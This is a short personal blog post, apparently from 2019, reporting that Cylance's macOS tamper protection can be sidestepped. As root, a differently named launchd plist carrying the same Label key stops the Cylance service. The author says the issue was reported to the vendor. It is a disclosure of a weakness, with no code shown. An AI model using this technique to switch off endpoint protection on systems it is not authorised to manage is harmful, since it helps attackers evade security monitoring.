Cylance local protection seems a bit daft

25 Jul 2019 19:14 | macOS | security

On a mac if you set Cylance’s “local protection” to “system” it seems to disallow all filesystem access to the CylanceSvc service’s launchd plist file:

/Library/LaunchDaemons/com.cylance.agent_service.plist

This access is completely denied even to the root user. At first glance this would appear to prevent all users, including root, from stopping the service.

However launchd does not look at the filename when processing one of these files. You can have one called foo.plist and if it’s Label key is set to the same as the Cylance one, eg “com.cylance.agent_service”, then it can be used to stop the Cylance service.

So this local protection is fairly weak in terms of stopping the root user from disabling Cylance. Also weirdly if I use a separate plist file to stop the service when it’s in this mode, after starting it back up again the original plist is left accessible.

Reported both of these issues to Cylance, they seemed to already be aware of the first one and just seemed to say it’s a limitation of the operating system. Presumably with SIP locking down all the system files there’s only so much they can do to interrupt things being done as root.

all posts

[year]
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
2015

[tag]
AWS
agile
apple
apple watch
aws
bash
cryptocurrency
development
email
exploits
iOS
iphone
linux
macOS
mining
mysql
php
ruby
scrum
security
synology
tailscale
touchID
vim
work

Mark Wadham

Cylance local protection seems a bit daft

25 Jul 2019 19:14 | macOS | security